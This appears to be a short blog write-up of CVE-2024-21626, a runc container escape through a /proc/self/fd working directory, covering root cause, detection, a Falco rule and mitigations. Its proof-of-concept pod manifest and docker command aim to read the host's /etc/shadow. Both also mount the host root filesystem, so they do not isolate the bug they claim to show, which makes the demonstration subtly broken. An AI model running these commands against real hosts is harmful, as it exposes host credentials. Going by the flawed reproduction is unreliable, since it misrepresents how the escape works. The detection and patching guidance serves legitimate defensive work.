CVE-2024-21626: runc Container Breakout via Working Directory
Vulnerability Breakdown 2 min read

CVE-2024-21626: runc Container Breakout via Working Directory

Technical analysis of a file descriptor leak vulnerability in runc ≤1.1.11 that enables container escape by poisoning the /proc/self/fd directory.

CVE Containers Linux Infrastructure
By Keith Rose

Abstract

CVE-2024-21626 is a container escape vulnerability in runc versions up to and including 1.1.11. By manipulating the container’s working directory, an attacker with the ability to launch a container can escape to the host filesystem with full root privileges.

Root Cause

When runc executes a container process, it leaks an open file descriptor (OFD) to the host’s /sys/fs/cgroup hierarchy. If the container’s working directory is set to /proc/self/fd/7/ (or another low-numbered fd), subsequent operations resolve against the host cgroup filesystem rather than the container root.

// Simplified vulnerable pattern in runc/libcontainer/standard_init_linux.go
// The cwd is not validated before chdir during init
os.Chdir(config.Cwd)

Exploitation Requirements

  • runc version ≤ 1.1.11
  • Ability to specify container workdir (e.g., via Docker, Kubernetes, or containerd)
  • Container runs as root (common default)

Proof of Concept

# Kubernetes pod manifest demonstrating the vector
apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
spec:
  containers:
    - name: escape
      image: alpine
      workingDir: "/proc/self/fd/7"
      command: ["sh", "-c", "cat /host/etc/shadow"]
      volumeMounts:
        - name: host
          mountPath: /host
  volumes:
    - name: host
      hostPath:
        path: /
# Direct Docker reproduction
docker run --rm -it \
  --workdir=/proc/self/fd/7 \
  -v /:/host:rw \
  alpine:latest sh -c "cd .. && ls /host/etc/shadow"

Detection

Audit container runtime events for:

  • workdir values containing /proc/self/fd/
  • openat syscalls resolving outside the container root after chdir
  • Container processes accessing host-only paths like /sys/fs/cgroup/system.slice/
# Runtime audit (requires Falco or similar)
- rule: Suspicious Container Workdir
  desc: Detect container workloads using proc fd paths as cwd
  condition: spawn_process and proc.cwd contains /proc/self/fd
  output: "Suspicious container cwd (user=%user.name cwd=%proc.cwd)"
  priority: CRITICAL

Mitigation

  1. Patch: Upgrade to runc 1.1.12 or later
  2. Harden: Enforce OCI runtime policies that reject suspicious cwd values
  3. Monitor: Deploy runtime security tools with rules for proc-fd-based directory traversal

CVSS v3.1 Score

MetricValue
CVSS8.6 (High)
VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE-22Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)